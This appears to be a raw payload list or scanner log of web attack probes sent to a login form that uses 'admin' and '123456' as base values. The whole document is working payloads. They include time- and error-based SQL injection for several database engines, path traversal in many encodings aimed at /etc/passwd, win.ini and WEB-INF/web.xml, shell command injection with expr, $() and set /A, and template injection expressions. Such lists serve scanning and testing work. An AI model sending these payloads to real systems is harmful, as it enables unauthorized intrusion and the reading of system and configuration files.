123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%
123456
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
..\..\..\..\..\..\Windows\win.ini
123456
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
.\..\..\..\..\..\..\Windows\win.ini
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
..\..\..\..\..\..\Windows\win.ini admin
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini
123456
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
../../../../../../../../../../../../../../../../../../Windows/win.ini
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
./../../../../../../../../../../../../../../../../../../Windows/win.ini
123456
../../../../../../../../../../../../../../../../../../Windows/win.ini admin
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
../../../../../../Windows/win.ini
123456
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('r',0)
./../../../../../../Windows/win.ini
123456
admin
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('d',2)
../../../../../../Windows/win.ini admin
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',2)='q
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
WEB-INF/web.xml
123456
WEB-INF/web.xml;admin
123456
../WEB-INF/web.xml
123456
../WEB-INF/web.xml;admin
123456
../../WEB-INF/web.xml
123456
../../WEB-INF/web.xml;admin
123456
../../../WEB-INF/web.xml
123456
../../../WEB-INF/web.xml;admin
123456
../../../../WEB-INF/web.xml
123456
../../../../WEB-INF/web.xml;admin
123456
admin
123456
admin
123456 expr 833430721 + 811809445
admin
123456
admin
123456
/*1*/{{905275116+965720087}}
123456
admin
${@var_dump(md5(440672157))};
../../../../../../../../../../../../../../../../../../etc/passwd
123456
admin
${845345505+970699858}
admin
123456
${886073566+802418642}
123456
admin
123456|expr 880780741 + 888417010
admin
123456
admin
'-var_dump(md5(142434618))-'
${845065946+976463462}
123456
${(872715000+995376658)?c}
123456
../../../../../../../../../../../../../../../../../../etc/passwd admin
123456
admin
123456
admin
123456$(expr 881688310 + 808247724)
admin
123456
${@var_dump(md5(386977074))};
123456
#set($c=953481390+921572764)${c}$c
123456
admin'and/**/extractvalue(1,concat(char(126),md5(1024673409)))and'
123456
./../../../../../../../../../../../../../../../../../../etc/passwd
123456
admin
123456
'-var_dump(md5(960398728))-'
123456
admin
123456&set /A 908442469+964666222
admin'and'r'='r
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
123456
<%- 851815762+976919804 %>
123456
admin
123456
admin"and/**/extractvalue(1,concat(char(126),md5(1909527390)))and"
123456
extractvalue(1,concat(char(126),md5(1673924167)))
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456
admin
123456
admin'and'd'='b
123456
admin
expr 833858734 + 927346789
admin
123456
../../../../../../etc/passwd
123456
admin"and"x"="x
123456
admin expr 831517820 + 839872796
123456
../../../../../../etc/passwd admin
123456
admin
123456
admin"and"q"="k
123456
admin
123456
./../../../../../../etc/passwd
123456
admin|expr 863139843 + 883205439
123456
admin'and(select'1'from/**/cast(md5(1452397476)as/**/int))>'0
123456
admin
123456
admin
123456
admin$(expr 809099361 + 923259789)
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
123456
admin/**/and/**/cast(md5('1000339659')as/**/int)>0
123456
admin
/*1*/{{936749190+957350625}}
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin&set /A 848116658+862539641
123456
admin
${839916068+897532230}
admin
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1133487279')))
123456
/etc/passwd
123456
admin
123456
expr 820964021 + 857653604
123456
admin
${(930780155+887579752)?c}
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1671181107')))>'0
123456
admin
123456
/etc/passwd admin
123456
admin
#set($c=894732356+925114977)${c}$c
admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
admin
123456
%2fetc%2fpasswd
123456
admin
123456
admin鎈'"\(
123456
%u2215etc%u2215passwd
123456
admin
<%- 954694835+907538423 %>
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
admin'"\(
123456
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
123456
admin
123456
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
admin
123456
admin
123456
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
123456
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
admin
123456
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini admin
123456
admin
123456
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%
123456
admin
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456
..\..\..\..\..\..\windows/win.ini
123456
admin
123456
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
.\..\..\..\..\..\..\windows/win.ini
123456
admin
123456
..\..\..\..\..\..\windows/win.ini admin
123456
admin'and(select+1)>0waitfor/**/delay'0:0:0
123456
admin
123456
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini
123456
admin'and(select+1)>0waitfor/**/delay'0:0:2
123456
admin
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',0)='k
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1120218383)))and'
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',2)='k
123456
../../../../../../../../../../../../../../../../../../windows/win.ini
123456
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1091284058)))and"
admin
123456
./../../../../../../../../../../../../../../../../../../windows/win.ini
123456
admin
extractvalue(1,concat(char(126),md5(1198162995)))
../../../../../../../../../../../../../../../../../../windows/win.ini admin
123456
admin
123456
admin
123456'and(select'1'from/**/cast(md5(1555805162)as/**/int))>'0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
123456
admin
123456
admin
123456/**/and/**/cast(md5('1858557798')as/**/int)>0
admin
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1000293022')))
admin
123456
../../../../../../windows/win.ini
123456
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1912241242')))>'0
./../../../../../../windows/win.ini
123456
admin
123456
../../../../../../windows/win.ini admin
123456
admin
123456鎈'"\(
admin
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini
123456
admin
123456'"\(
admin
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
123456
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
123456
admin
123456
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini admin
123456
admin
123456
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%
123456
admin
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456
..\..\..\..\..\..\windows/win.ini
123456
admin
123456
.\..\..\..\..\..\..\windows/win.ini
123456
..\..\..\..\..\..\windows/win.ini admin
123456
admin
123456
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456
../../../../../../../../../../../../../../../../../../windows/win.ini
123456
admin
123456
./../../../../../../../../../../../../../../../../../../windows/win.ini
123456
admin
123456
../../../../../../../../../../../../../../../../../../windows/win.ini admin
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
123456
admin
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456
../../../../../../windows/win.ini
123456
./../../../../../../windows/win.ini
123456
admin
123456
../../../../../../windows/win.ini admin
123456
admin
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini
123456
admin
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456
admin
123456/**/and+3=3
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
123456
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
123456
admin
123456/**/and+0=8
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini admin
123456
admin
123456'and't'='t
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456'and'y'='s
admin
123456"and"g"="g
..\..\..\..\..\..\Windows\win.ini
123456
admin
123456"and"t"="p
.\..\..\..\..\..\..\Windows\win.ini
123456
admin
(select*from(select+sleep(0)union/**/select+1)a)
..\..\..\..\..\..\Windows\win.ini admin
123456
admin
(select*from(select+sleep(2)union/**/select+1)a)
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini
123456
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
../../../../../../../../../../../../../../../../../../Windows/win.ini
123456
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
./../../../../../../../../../../../../../../../../../../Windows/win.ini
123456
../../../../../../../../../../../../../../../../../../Windows/win.ini admin
123456
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
../../../../../../Windows/win.ini
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
./../../../../../../Windows/win.ini
123456
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
../../../../../../Windows/win.ini admin
123456
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
WEB-INF/web.xml
123456
WEB-INF/web.xml;admin
123456
../WEB-INF/web.xml
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
../WEB-INF/web.xml;admin
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
../../WEB-INF/web.xml
123456
admin
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
../../WEB-INF/web.xml;admin
123456
admin
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('p',2)
../../../WEB-INF/web.xml
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e
../../../WEB-INF/web.xml;admin
123456
../../../../WEB-INF/web.xml
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',2)='q
../../../../WEB-INF/web.xml;admin
123456